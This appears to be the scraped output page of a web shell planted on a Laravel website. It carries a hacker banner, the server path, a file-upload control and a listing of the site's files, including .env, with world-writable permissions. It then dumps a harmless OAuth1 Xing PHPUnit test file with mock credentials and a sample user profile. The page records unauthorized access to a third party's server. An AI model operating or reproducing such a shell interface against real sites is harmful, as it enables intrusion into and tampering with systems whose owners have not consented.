I am a hacker in the dark of a very cold night

path :/var/www/html/vorne.webheaydemo.com

upload file:

List of files:

name file	size	edit	permission
.editorconfig	276 KB	March 05 2024 07:12:34	0666
.env	1385 KB	May 24 2024 16:43:55	0666
.env.example	1088 KB	March 05 2024 07:12:34	0666
.gitattributes	190 KB	March 05 2024 07:12:34	0666
.gitignore	245 KB	March 05 2024 07:12:34	0666
.htaccess	947 KB	July 04 2023 21:25:08	0664
.rnd	1024 KB	March 13 2024 04:51:14	0666
README.md	472 KB	March 22 2024 10:35:00	0666
app	-	March 05 2024 07:12:34	0777
artisan	1739 KB	March 05 2024 07:12:34	0666
bootstrap	-	March 05 2024 07:12:34	0777
composer.json	2829 KB	May 13 2024 12:10:04	0666
composer.lock	417205 KB	March 19 2024 12:13:14	0666
config	-	July 03 2025 02:53:36	0777
database	-	March 05 2024 07:12:34	0777
index.php	1816 KB	May 13 2024 10:32:36	0666
lang	-	May 13 2024 14:53:26	0777
manifest.json	913 KB	May 14 2024 03:57:26	0664
package.json	398 KB	March 05 2024 07:12:34	0666
phpunit.xml	1206 KB	March 05 2024 07:12:34	0666
public	-	July 03 2025 02:37:20	0777
resources	-	May 13 2024 12:09:36	0777
routes	-	March 05 2024 07:12:34	0777
service-worker.js	924 KB	March 05 2024 07:12:34	0666
storage	-	March 05 2024 10:03:52	0777
symlink.php	218 KB	March 05 2024 07:12:34	0666
tests	-	March 05 2024 07:12:34	0777
vendor	-	March 19 2024 12:13:14	0777
vite.config.js	326 KB	March 05 2024 07:12:34	0666

getMockClientCredentials()); $credentials = $server->getClientCredentials(); $this->assertInstanceOf('League\OAuth1\Client\Credentials\ClientCredentialsInterface', $credentials); $this->assertEquals($this->getApplicationKey(), $credentials->getIdentifier()); $this->assertEquals('mysecret', $credentials->getSecret()); $this->assertEquals('http://app.dev/', $credentials->getCallbackUri()); } public function testCreatingWithObject() { $credentials = new ClientCredentials; $credentials->setIdentifier('myidentifier'); $credentials->setSecret('mysecret'); $credentials->setCallbackUri('http://app.dev/'); $server = new Xing($credentials); $this->assertEquals($credentials, $server->getClientCredentials()); } public function testGettingTemporaryCredentials() { $server = m::mock('League\OAuth1\Client\Server\Xing[createHttpClient]', [$this->getMockClientCredentials()]); $server->shouldReceive('createHttpClient')->andReturn($client = m::mock('stdClass')); $me = $this; $client->shouldReceive('post')->with('https://api.xing.com/v1/request_token', m::on(function ($options) use ($me) { $headers = $options['headers']; $me->assertTrue(isset($headers['Authorization'])); // OAuth protocol specifies a strict number of // headers should be sent, in the correct order. // We'll validate that here. $pattern = '/OAuth oauth_consumer_key=".*?", oauth_nonce="[a-zA-Z0-9]+", oauth_signature_method="HMAC-SHA1", oauth_timestamp="\d{10}", oauth_version="1.0", oauth_callback="' . preg_quote('http%3A%2F%2Fapp.dev%2F', '/') . '", oauth_signature=".*?"/'; $matches = preg_match($pattern, $headers['Authorization']); $me->assertEquals(1, $matches, 'Asserting that the authorization header contains the correct expression.'); return true; }))->once()->andReturn($response = m::mock(ResponseInterface::class)); $response->shouldReceive('getBody')->andReturn('oauth_token=temporarycredentialsidentifier&oauth_token_secret=temporarycredentialssecret&oauth_callback_confirmed=true'); $credentials = $server->getTemporaryCredentials(); $this->assertInstanceOf('League\OAuth1\Client\Credentials\TemporaryCredentials', $credentials); $this->assertEquals('temporarycredentialsidentifier', $credentials->getIdentifier()); $this->assertEquals('temporarycredentialssecret', $credentials->getSecret()); } public function testGettingDefaultAuthorizationUrl() { $server = new Xing($this->getMockClientCredentials()); $expected = 'https://api.xing.com/v1/authorize?oauth_token=foo'; $this->assertEquals($expected, $server->getAuthorizationUrl('foo')); $credentials = m::mock('League\OAuth1\Client\Credentials\TemporaryCredentials'); $credentials->shouldReceive('getIdentifier')->andReturn('foo'); $this->assertEquals($expected, $server->getAuthorizationUrl($credentials)); } public function testGettingTokenCredentialsFailsWithManInTheMiddle() { $server = new Xing($this->getMockClientCredentials()); $credentials = m::mock('League\OAuth1\Client\Credentials\TemporaryCredentials'); $credentials->shouldReceive('getIdentifier')->andReturn('foo'); $this->expectException(InvalidArgumentException::class); $server->getTokenCredentials($credentials, 'bar', 'verifier'); } public function testGettingTokenCredentials() { $server = m::mock('League\OAuth1\Client\Server\Xing[createHttpClient]', [$this->getMockClientCredentials()]); $temporaryCredentials = m::mock('League\OAuth1\Client\Credentials\TemporaryCredentials'); $temporaryCredentials->shouldReceive('getIdentifier')->andReturn('temporarycredentialsidentifier'); $temporaryCredentials->shouldReceive('getSecret')->andReturn('temporarycredentialssecret'); $server->shouldReceive('createHttpClient')->andReturn($client = m::mock('stdClass')); $me = $this; $client->shouldReceive('post')->with('https://api.xing.com/v1/access_token', m::on(function ($options) use ($me) { $headers = $options['headers']; $body = $options['form_params']; $me->assertTrue(isset($headers['Authorization'])); // OAuth protocol specifies a strict number of // headers should be sent, in the correct order. // We'll validate that here. $pattern = '/OAuth oauth_consumer_key=".*?", oauth_nonce="[a-zA-Z0-9]+", oauth_signature_method="HMAC-SHA1", oauth_timestamp="\d{10}", oauth_version="1.0", oauth_token="temporarycredentialsidentifier", oauth_signature=".*?"/'; $matches = preg_match($pattern, $headers['Authorization']); $me->assertEquals(1, $matches, 'Asserting that the authorization header contains the correct expression.'); $me->assertSame($body, ['oauth_verifier' => 'myverifiercode']); return true; }))->once()->andReturn($response = m::mock(ResponseInterface::class)); $response->shouldReceive('getBody')->andReturn('oauth_token=tokencredentialsidentifier&oauth_token_secret=tokencredentialssecret'); $credentials = $server->getTokenCredentials($temporaryCredentials, 'temporarycredentialsidentifier', 'myverifiercode'); $this->assertInstanceOf('League\OAuth1\Client\Credentials\TokenCredentials', $credentials); $this->assertEquals('tokencredentialsidentifier', $credentials->getIdentifier()); $this->assertEquals('tokencredentialssecret', $credentials->getSecret()); } public function testGettingUserDetails() { $server = m::mock('League\OAuth1\Client\Server\Xing[createHttpClient,protocolHeader]', [$this->getMockClientCredentials()]); $temporaryCredentials = m::mock('League\OAuth1\Client\Credentials\TokenCredentials'); $temporaryCredentials->shouldReceive('getIdentifier')->andReturn('tokencredentialsidentifier'); $temporaryCredentials->shouldReceive('getSecret')->andReturn('tokencredentialssecret'); $server->shouldReceive('createHttpClient')->andReturn($client = m::mock('stdClass')); $me = $this; $client->shouldReceive('get')->with('https://api.xing.com/v1/users/me', m::on(function ($options) use ($me) { $headers = $options['headers']; $me->assertTrue(isset($headers['Authorization'])); // OAuth protocol specifies a strict number of // headers should be sent, in the correct order. // We'll validate that here. $pattern = '/OAuth oauth_consumer_key=".*?", oauth_nonce="[a-zA-Z0-9]+", oauth_signature_method="HMAC-SHA1", oauth_timestamp="\d{10}", oauth_version="1.0", oauth_token="tokencredentialsidentifier", oauth_signature=".*?"/'; $matches = preg_match($pattern, $headers['Authorization']); $me->assertEquals(1, $matches, 'Asserting that the authorization header contains the correct expression.'); return true; }))->once()->andReturn($response = m::mock(ResponseInterface::class)); $response->shouldReceive('getBody')->once()->andReturn($this->getUserPayload()); $user = $server->getUserDetails($temporaryCredentials); $this->assertInstanceOf('League\OAuth1\Client\Server\User', $user); $this->assertEquals('Roman Gelembjuk', $user->name); $this->assertEquals('17144430_0f9409', $server->getUserUid($temporaryCredentials)); $this->assertEquals('XXXXXXXXXX@gmail.com', $server->getUserEmail($temporaryCredentials)); $this->assertEquals('Roman Gelembjuk', $server->getUserScreenName($temporaryCredentials)); } protected function getMockClientCredentials() { return [ 'identifier' => $this->getApplicationKey(), 'secret' => 'mysecret', 'callback_uri' => 'http://app.dev/', ]; } protected function getApplicationKey() { return 'abcdefghijk'; } protected function getApplicationExpiration($days = 0) { return is_numeric($days) && $days > 0 ? $days . 'day' . ($days == 1 ? '' : 's') : 'never'; } protected function getApplicationName() { return 'fizz buzz'; } private function getUserPayload() { return '{ "users":[ { "id":"17144430_0f9409", "active_email":"XXXXXXXXXX@gmail.com", "time_zone": { "utc_offset":3.0, "name":"Europe/Kiev" }, "display_name":"Roman Gelembjuk", "first_name":"Roman", "last_name":"Gelembjuk", "gender":"m", "page_name":"Roman_Gelembjuk", "birth_date": {"year":null,"month":null,"day":null}, "wants":null, "haves":null, "interests":null, "web_profiles":{}, "badges":[], "photo_urls": { "large":"https://x1.xingassets.com/assets/frontend_minified/img/users/nobody_m.140x185.jpg", "maxi_thumb":"https://x1.xingassets.com/assets/frontend_minified/img/users/nobody_m.70x93.jpg", "medium_thumb":"https://x1.xingassets.com/assets/frontend_minified/img/users/nobody_m.57x75.jpg" }, "permalink":"https://www.xing.com/profile/Roman_Gelembjuk", "languages":{"en":null}, "employment_status":"EMPLOYEE", "organisation_member":null, "instant_messaging_accounts":{}, "educational_background": {"degree":null,"primary_school":null,"schools":[],"qualifications":[]}, "private_address":{ "street":null, "zip_code":null, "city":null, "province":null, "country":null, "email":"XXXXXXXX@gmail.com", "fax":null, "phone":null, "mobile_phone":null} ,"business_address": { "street":null, "zip_code":null, "city":"Ivano-Frankivsk", "province":null, "country":"UA", "email":null, "fax":null,"phone":null,"mobile_phone":null }, "premium_services":[] }]}'; } }